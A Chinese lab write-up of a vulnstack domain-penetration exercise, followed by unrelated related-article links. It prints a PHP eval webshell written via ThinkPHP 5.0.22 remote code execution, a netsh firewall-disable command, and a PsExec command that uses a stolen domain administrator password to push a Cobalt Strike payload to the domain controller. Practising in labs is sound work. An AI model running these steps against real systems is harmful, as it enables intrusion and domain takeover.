单机域渗透练习

简介: 单机域渗透练习

环 境

Win7 +phpstudy+thinkphp(5.0.22) 双网卡

ip  192.168.5.139       桥接模式

ip  192.168.138.136   仅主机模式

Win2008                  仅主机模式

ip 192.168.5.139

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

首先访问url

http://192.168.5.139/

Goby扫描 发现tp5.x 远程命令执行

查看目录后 写入一句话


echo "<?php @eval($_POST['123']);?>" >C://phpStudy//PHPTutorial//WWW//public//shell.php


菜刀连接

查看存活主机


查看详细ip地址  ipconfig  /all  可以看到域  (忘了截图)

查找域ip  ping sun.com

查看域内用户

640.png

提权system 查看进程无杀毒软件

CS制作木马 一直连不上

发现防火墙没有关闭 直接关闭

netsh firewall set opmode disable

获取域用户密码

提权SYSTEM

内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口

Win7  双网卡 dc 内网 这个时候就让dc主动链接cs 可以通过win7 中转会话

win7  进入中专 建立监听 监听地址6666

再次生成木马 选择刚才的监听 6666

把木马和工具上传到win7

640.png

刚才我们看到了域内有三个用户 这里的用户就是域内用户 密码在上面已经抓取出来了

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138-u sun\Administrator -p admin@123 -d -c C:\phpStudy\PHPTutorial\WWW\public\dc.exe

抓取密码 可以看到dc的密码了域控也就到手了

相关文章
|
4月前
|
Oracle 关系型数据库 数据库
关系型数据库Oracle 故障转移能力
【7月更文挑战第10天】
60 2
|
6月前
|
安全 网络安全 网络虚拟化
虚拟网络设备的网络隔离机制:原理、意义与应用场景深度分析
虚拟网络设备在现代网络架构中扮演着重要角色🌐,尤其是在实现网络隔离方面🛡️。网络隔离是网络安全🔒和多租户环境管理的关键组成部分,它能够确保不同网络流量的分离🚦,保护敏感数据💾,减少攻击面。虚拟网络设备通过在软件层面上模拟物理网络设备的行为,提供了一种灵活且成本效益高的方式来实现这些目标。本文将从多个维度深入分析虚拟网络设备是如何隔离网络的,这种隔离有什么实际意义,为什么需要虚拟网络设备来隔离网络,以及在什么场景下比较适合使用虚拟网络设备隔离网络。
|
安全 网络协议 架构师
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.5(一)
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.5
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.5(一)
|
网络协议 前端开发 虚拟化
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.4
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.4
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.4
|
存储 边缘计算 缓存
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.1(二)
《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.1
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.1(二)
|
边缘计算 编解码 数据可视化
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.5(一)
《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.5
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.5(一)
|
边缘计算 网络虚拟化
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.2
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.2
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第三章软件定义访问运作方法3.2
|
边缘计算 编解码 数据可视化
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3(四)
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3(四)
|
边缘计算 安全 网络安全
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3(五)
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3(五)